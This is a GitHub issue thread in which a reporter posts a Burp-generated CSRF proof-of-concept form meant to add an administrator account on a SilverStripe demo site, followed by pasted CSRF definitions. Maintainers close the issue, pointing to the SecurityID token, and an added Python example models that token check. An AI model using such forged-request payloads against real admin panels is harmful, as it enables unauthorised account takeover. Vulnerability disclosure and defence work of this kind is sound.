silverstripe-archive / silverstripe-mobile

Mobile support module for SilverStripe CMS
http://silverstripe.org/mobile/
BSD 3-Clause "New" or "Revised" License

There is a CSRF vulnerability that can add the administrator account #60

Closed AutismJH closed 6 years ago

AutismJH commented 6 years ago

After the administrator has logged in, open the following page to add an administrator.

POC:
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.silverstripe.org/admin/security/EditForm/field/Members/item/new/ItemEditForm/" method="POST">
      <input type="hidden" name="FirstName" value="22222" />
      <input type="hidden" name="Surname" value="22222" />
      <input type="hidden" name="Email" value="22222&#64;qq&#46;com" />
      <input type="hidden" name="Password&#91;&#95;Password&#93;" value="22222" />
      <input type="hidden" name="Password&#91;&#95;ConfirmPassword&#93;" value="22222" />
      <input type="hidden" name="Locale" value="zh&#95;CN" />
      <input type="hidden" name="FailedLoginCount" value="22222" />
      <input type="hidden" name="DirectGroups&#91;&#93;" value="1" />
      <input type="hidden" name="SecurityID" value="880be6fd0e7bce8afccbb28967034251f607808c" />
      <input type="hidden" name="action&#95;doSave" value="1" />
      <input type="hidden" name="BackURL" value="https&#58;&#47;&#47;demo&#46;silverstripe&#46;org&#47;admin&#47;security&#47;EditForm&#47;field&#47;Members&#47;item&#47;new" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
AutismJH commented 6 years ago

Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf[1]) or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts.[2] There are many ways in which a malicious website can transmit such commands; specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests, for example, can all work without the user's interaction or even knowledge. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

AutismJH commented 6 years ago

CSRF commonly has the following characteristics:

It involves sites that rely on a user's identity. It exploits the site's trust in that identity. It tricks the user's browser into sending HTTP requests to a target site. It involves HTTP requests that have side effects.

wilr commented 6 years ago

Closing this as it doesn't relate to the mobile module; CSRF is protected by the above-mentioned SecurityID token. In the future, please use security@silverstripe.org to disclose any potential security issues.
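An added example, not part of this thread and not SilverStripe's own code: a simplified model of a session-bound anti-CSRF token of the kind wilr refers to as SecurityID. It assumes a server-side session store and a handler that compares the submitted token against the one stored in the session named by the cookie, and shows why a page like the PoC above, which carries a fixed SecurityID copied from another session, is rejected when the victim's browser submits it.

```python
# Constructed, minimal model of a per-session anti-CSRF token (assumption: the
# token lives in server-side session state and is compared on every
# state-changing POST). Not SilverStripe's implementation.
import hmac
import secrets

# Constructed in-memory session store: session cookie value -> session data.
SESSIONS = {}

def start_session():
    """Create a session and mint a fresh, unguessable SecurityID bound to it."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"SecurityID": secrets.token_hex(20)}
    return sid

def render_form(sid):
    """Fields the server embeds in its own member-edit form for this session."""
    return {"SecurityID": SESSIONS[sid]["SecurityID"], "action_doSave": "1"}

def handle_post(cookie_sid, fields):
    """Accept a state-changing POST only if the submitted SecurityID equals the
    one stored in the session identified by the request's cookie."""
    session = SESSIONS.get(cookie_sid)
    if session is None:
        return "rejected: no session"
    submitted = fields.get("SecurityID", "")
    # Constant-time comparison so the check does not leak the token via timing.
    if not hmac.compare_digest(submitted, session["SecurityID"]):
        return "rejected: bad SecurityID"
    return "saved member %s" % fields.get("Email", "")

def demo():
    """Legitimate submission vs. a cross-site page carrying a foreign token."""
    victim = start_session()
    attacker = start_session()
    # Legitimate: the browser posts the form the server rendered for this session.
    legit = dict(render_form(victim), Email="admin@example.test")
    # Cross-site: the page embeds the token from the attacker's own session,
    # but the browser attaches the victim's cookie, so the tokens do not match.
    forged = {"SecurityID": SESSIONS[attacker]["SecurityID"],
              "Email": "22222@qq.com", "action_doSave": "1"}
    return handle_post(victim, legit), handle_post(victim, forged)

if __name__ == "__main__":
    print(demo())
```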

robbieaverill commented 6 years ago

If this represents a security issue related to the SilverStripe CMS, please email the details to security@silverstripe.org rather than reporting it on GitHub.